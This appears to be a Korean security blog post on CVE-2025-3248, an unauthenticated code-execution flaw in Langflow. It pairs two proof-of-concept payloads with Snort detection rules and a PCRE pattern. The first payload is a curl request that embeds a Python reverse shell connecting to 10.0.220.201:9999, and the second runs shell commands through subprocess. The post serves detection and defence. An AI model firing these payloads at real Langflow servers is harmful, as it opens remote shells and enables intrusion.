Poc case #1
Poc 1
| curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"10.0.220.201\\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"/bin/sh\\\")\")\ndef foo():\n pass"}' |
snort rule example 1
| alert tcp $EXTERNAL_NET any -> $HOME_NET 8000 (msg:"CVE-2025-3248 Langflow Unauth RCE Attempt"; flow:to_server,established; content:"POST"; http_method; content:"/api/v1/validate/code"; http_uri; content:"code"; http_raw_body; content:"@exec"; http_raw_body; classtype:attempted-admin; sid:1000001; rev:1;) |
ref.
| pcre:"/code.*(__import__|subprocess|os\.system)/i"; |
Poc 2
| def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')): pass |
| alert tcp $EXTERNAL_NET any -> $HOME_NET 8000 (msg:"CVE-2025-3248 Langflow Unauth RCE PoC Attempt - Subprocess Execution"; flow:to_server,established; content:"POST"; http_method; content:"/api/v1/validate/code"; http_uri; content:"code"; http_raw_body; content:"exec"; http_raw_body; content:"subprocess"; http_raw_body; content:"check_output"; http_raw_body; content:"shell=True"; http_raw_body; classtype:attempted-admin; sid:1000002; rev:1;) |
Poc1 && Poc2
| alert tcp $EXTERNAL_NET any -> $HOME_NET 8000 (msg:"CVE-2025-3248 Langflow Unauth RCE Common Pattern"; flow:to_server,established; content:"POST"; http_method; content:"/api/v1/validate/code"; http_uri; content:"code"; http_raw_body; content:"exec"; http_raw_body; classtype:attempted-admin; sid:1000004; rev:1;) |
content:"POST";
content:"/api/v1/validate/code";
content:"code";
content:"exec";
'잡학IT' 카테고리의 다른 글
| 이미지 파일의 시그니처(Magic Number) 정리 (0) | 2025.05.13 |
|---|---|
| malware 연구 참고 사이트(2025. 05. 11 업데이트) (0) | 2025.05.09 |
| 패킷 분석에 도움이 되는 사이트 (0) | 2024.10.24 |
| Just-In-Time(JIT) compilation (1) | 2024.10.21 |
| 웹 애플리케이션 취약점을 시뮬레이션하기 위한 도구 (4) | 2024.10.18 |
